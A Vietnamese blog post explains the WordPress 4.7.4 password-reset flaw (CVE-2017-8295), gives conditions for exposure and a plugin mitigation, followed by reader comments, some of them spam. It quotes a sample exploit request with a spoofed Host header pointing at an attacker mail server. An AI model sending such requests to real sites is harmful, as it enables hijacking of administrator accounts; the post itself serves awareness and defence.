Trang chủ Wordpress Lỗi 0-day của WordPress 4.7.4 và nó có nguy hại không?

Lỗi 0-day của WordPress 4.7.4 và nó có nguy hại không?

bởi Thạch Phạm
34 bình luận 14445 views
Khuyến mãi hosting

Hôm nay có thể bạn đã từng nghe qua thông báo của mọi người rằng WordPress phiên bản 4.7.4 được phát hiện một lỗi 0-day (CVE-2017-8295) giúp tin tặc có thể lấy mật khẩu của người quản trị cao nhất là admin thông qua việc reset mật khẩu không cần cấp quyền vào email của chủ sỡ hữu.

Về chi tiết lỗi này bạn có thể tham khảo diễn giải chi tiết tại https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html.

Tuy nhiên trong bài viết này mình sẽ giải thích thêm và chúng ta có thể biết rằng bạn có nguy cơ bị khai thác hay không, từ đó mới áp dụng cách cài plugin chặn reset mật khẩu.

Kịch bản tấn công

Theo ExplotItBox, đầu tiên tin tặc sẽ gửi một truy vấn HTTP tới website thông qua địa chỉ IP, nghĩa là website của bạn phải truy cập được thông qua IP. Nếu bạn nào dùng Shared Hosting sử dụng cPanel bản mới nhất thì không cần lo lắng nữa vì trước đây lâu lắm rồi họ đã có một bản vá về lỗi 0-day trên Linux, và với Shared Hosting bạn cũng không thể truy cập vào website thông qua IP.

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
user_login=admin&redirect_to=&wp-submit=Get+New+Password

Ở đoạn trên, tin tặc sẽ ghim địa chỉ máy chủ email của họ vào, và trên Apache thì SERVER_NAME sẽ tự động thay thế bằng giá trị HOST trong truy vấn trên, tức là địa chỉ máy chủ email của tin tặc.

Khi đó, người quản trị sẽ nhận 1 email như sau:

Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

Bạn sẽ thấy phần Return-Path sẽ chứa giá trị mà WordPress tự điền vào giá trị SERVER_NAME, tức là wordpress@địa-chỉ-máy-chủ-email-tin-tặc.ltd và kể cả Message-ID cũng chứa một địa chỉ của tin tặc.

Như vậy là đã rõ, nếu hệ thống hoặc người dùng vô tình phản hồi email này, thì tin tặc sẽ nhận chính cái nội dung email chứa khóa khôi phục mật khẩu quản trị. Như vậy ta sẽ có 3 trường hợp như sau:

  1. Một số email của người quản trị có tính năng tự động trả lời email kèm nội dung email được trả lời.
  2. Tin tặc sẽ gửi một lượng lớn email khiến máy chủ của người dùng bị ngập lụt dung lượng sử dụng hay đại loại vậy khiến email không thể gửi đi và phản hồi ngược lại.
  3. Nếu người dùng quản trị dùng email của Gmail hay các nhà cung cấp mail khác, tin tặc sẽ phải gửi một lượng lớn truy vấn như trên để nhà cung cấp chặn địa chỉ máy chủ tin tặc, từ đó email không thể gửi đi và phản hồi ngược lại.

Vậy điều này có nguy hiểm với bạn không?

Suy xét ra thì lỗi này sẽ nghiêm trọng và bạn có thể bị ảnh hưởng nếu:

  • Bạn đang dùng webserver Apache và có thể truy cập vào website thông qua IP. Nghĩa là không tạo virtualhost ấy.
  • Tin tặc phải biết được tên đăng nhập của người quản trị.
  • Tập tin wp-login.php phải được truy cập trực tiếp. Một số plugin ẩn đường dẫn đăng nhập như iThemes Security sẽ tự động chặn truy cập trực tiếp qua tập tin này. Ví dụ: https://thachpham.com/wp-login.php.
  • Người quản trị phải dùng email tự host thì sẽ may ra có nguy cơ, còn Gmail hay gì đó thì phải gửi một lượng email cực lớn cùng lúc họ mới chặn một máy chủ gửi đi.

Như vậy nếu bạn thỏa mãn các điều kiện trên thì có thể phòng chống bằng cách cài plugin Disable Password Reset để chặn chức năng quên mật khẩu đi. Còn nếu không thì lỗi này cũng không thật sự quá nguy hiểm như chúng ta tưởng tượng. Tuy nhiên trong tương lai, WordPress sẽ ra một bản vá để chúng ta yên tâm hơn.

34 bình luận

Có thể bạn quan tâm

34 bình luận

kiếm tiền 101 21/07/2020 - 4:25 Chiều

Bạn đang tìm hiểu về Affiliate hay Affiliate Marketing để phát triển website hay đơn giản là để <a href=”https://kiemtien101.com/chia-se-cach-kiem-tien/” rel=”dofollow”><strong>kiếm tiền online</strong></a>, để mỗi tháng bạn sẽ có một nguồn thu nhập thụ động dễ dàng. Tại https://Kiemtien101.com chúng tôi chia sẻ rất nhiều các bước cơ bản và bài bản để xây dựng được Affiliate hiệu quả và lợi nhuận. Bên cạnh đó còn có rất nhiều những bài chia sẻ thông tin hữu ích về cách hình thức kiếm tiền Online khác nhau

Reply
Helu 14/06/2017 - 2:37 Chiều

Anh Thạch cho em hỏi là nếu mình sử dụng phiên bản 4.7.4 rồi mà mình muốn quay về bản 4.6 thì phải làm như thế nào anh? Có cách nào hạ phiên bản xuống mà ko phải cài lại ko anh

Reply
Eric 12/06/2017 - 7:14 Chiều

Cho mình hỏi xíu. Website của mình vào tìm kiếm thì nó hiện cả đường link domain,com/upload/file
Vậy mình làm sao để nó không hiện cả thư mục mình lưu trữ file trên tìm kiếm vậy.
Cảm ơn các bạn !!

Reply
sữa havit 12/06/2017 - 6:49 Chiều

nguy hiểm quá

Reply
Golf Song Anh 09/06/2017 - 3:24 Chiều

Cảm ơn a .!

Reply
Đỗ Quang 08/06/2017 - 7:44 Chiều

Chào tất tất cả ae Web mình báo lỗi khi kiểm tra trên trang :”validator.w3.org” như dưới thì mình phải sửa ở đâu ai giúp mk với :(( .
xin cám ơn.
Error: Bad start tag in a in head.

From line 98, column 62; to line 98, column 158

<a href="https://www.olark.com/site/6648-726-10-3006/contact" title="Contact us" target="_blank">Questi

Error: Stray end tag noscript.

From line 98, column 295; to line 98, column 305

ftware</a>↩<!--

Error: Stray end tag head.

From line 101, column 1; to line 101, column 7

code -->↩↩↩&lt;body

Error: Start tag body seen but an element of the same type was already open.

From line 102, column 1; to line 102, column 135

↩↩↩&lt;div c

Fatal Error: Cannot recover after last error. Any further errors will be ignored.

From line 102, column 1; to line 102, column 135

↩↩↩&lt;div c

Reply
Học Luật 02/06/2017 - 11:32 Sáng

Giờ có wp 4.7.5 rồi, hên quá mình dùng vào thời điểm đẹp

Reply
Proteusion 01/06/2017 - 1:56 Chiều

Cảm ơn Thạch vì bài viết hữu ích và hướng dẫn khắc phục.

Reply
Việt Anh 27/05/2017 - 10:27 Sáng

Thỉnh thoảng vẫn gặp mấy lỗi này. Bài viết hay, cảm ơn bác.

Reply
Thucle Blog 26/05/2017 - 11:08 Sáng

Thực ra cũng không nguy hiểm nếu mình biết tự bảo vệ mình. cập nhật tin tức sớm sẽ tránh được thôi

Reply
ngu si 25/05/2017 - 3:52 Chiều

<

blockquote>

<

ol>
l

Reply
tháp oxy hóa 22/05/2017 - 4:20 Chiều

mình cũng có web chạy WordPress. nhưng do nhà cung cấp tự động nâng cấp phiên bản. làm thế nào để khắc phục nhỉ @@

Reply
tiger 18/05/2017 - 10:42 Chiều

đã có Version 4.7.5 không biết bản này có lổi gì không nữa ? update tiên phong https://phuonghoangtrans.com

Reply
LTTK 12/05/2017 - 9:56 Chiều

Edit by Thạch: Không phải là chỗ để spam.

Reply
Kien 12/05/2017 - 11:47 Sáng

Lỗi này thật ra chả có gì, tại sao tôi đọc bài này thấy dời dạc và lủng củng vậy nhỉ =.=

Reply
tuvanbds24h 12/05/2017 - 9:34 Sáng

Cũng hên không cập nhập lên wp mới, không là mệt mỏi rồi

Reply
Minh Vuong Tech 12/05/2017 - 3:11 Sáng

Từ 4.4.7 trở xuống đều dính nhé mọi người.

Reply
Vy Vy 11/05/2017 - 7:24 Chiều

Cho hỏi mình xài theme truereview, mỗi post theme đều thống kê view ngay trên đầu bài, khổ nỗi nó quá thấp chênh lệch nhiều so với 4 plugin thống kê mình xài. Hiếm lắm mới có 2-3 bài view xấp xỉ. Có cách nào xoá cái postview của theme này không? Mình không biết theme tính view pót kiểu gì, mình là ad mà F5 nó cũng tính view, sao khách vào nó không tính?

Reply
Tien 18/05/2017 - 2:27 Chiều

website của bạn có cài cache không, nếu có thì cũng có thể là vấn đề kiến nó ko update cho khách đó

Reply
Nguyen Van Dinh 11/05/2017 - 4:55 Chiều

Rất thú vị, cảm ơn Thạch.

Reply
Linh 11/05/2017 - 4:05 Chiều

Thật ngớ ngẩn, WordPress quá ngớ ngẩn =))

Reply
ClouF Link Pfa 11/05/2017 - 4:04 Chiều

lỗi này ảnh hưởng tất cả phiên bản wordpress từ 4.7.4 trở xuống nhé

Reply
Lý Thành Phúc 10/05/2017 - 5:22 Chiều

Cho em hỏi trong 4 điều kiện trên em dính 1 cái đầu tiên vì em dùng HOCVPS nên truy cập IP nó ra website chính, nhưng cái domain chính em dùng domain ảo và không chứa gì trên đó nên khi vào bằng IP nó ra trang trắng như thế thì có bị ảnh hưởng không ạ ?

Reply
Thạch Phạm 28/05/2017 - 7:16 Chiều

Nhưng HocVPS dùng NGINX làm backend với PHP-FPM nên bạn không cần lo đâu.

Reply
ClouF Link Pfa 10/05/2017 - 12:43 Sáng

Hôm nay có thể bạn đã từng nghe qua thông báo của mọi người rằng WordPress phiên bản 4.7.4 được phát hiện một lỗi 0-day

Reply
ClouF Link Pfa 10/05/2017 - 12:43 Sáng

oke

Reply
fmachna 10/05/2017 - 12:42 Sáng

lỗi này ảnh hưởng tất cả phiên bản wordpress từ 4.7.4 trở xuống nhé

Reply
fmachna 10/05/2017 - 12:42 Sáng

May quá chưa cập nhật lên WP mới nhất ?

Reply
fmachna 10/05/2017 - 12:40 Sáng

fa

Reply
công nghị 08/05/2017 - 9:29 Sáng

nên cài cài plugin Disable Password Reset cho chắc ăn, và cũng đỡ lo hơn

Reply
phimhd 06/05/2017 - 2:40 Chiều

cám ơn bài viết của bác đến kịp thời

Reply
Hoàng 05/05/2017 - 11:19 Chiều

cảm ơn Thạch, rất bổ ích

Reply
Chuột Bự 05/05/2017 - 4:53 Chiều

May quá chưa cập nhật lên WP mới nhất 🙁

Reply
Vir 06/05/2017 - 11:54 Chiều

lỗi này ảnh hưởng tất cả phiên bản wordpress từ 4.7.4 trở xuống nhé

Reply

Để lại một bình luận

* Khi bình luận, bạn đồng ý rằng thông tin bạn nhập vào bao gồm tên, email và địa chỉ IP sẽ được lưu giữ tại website.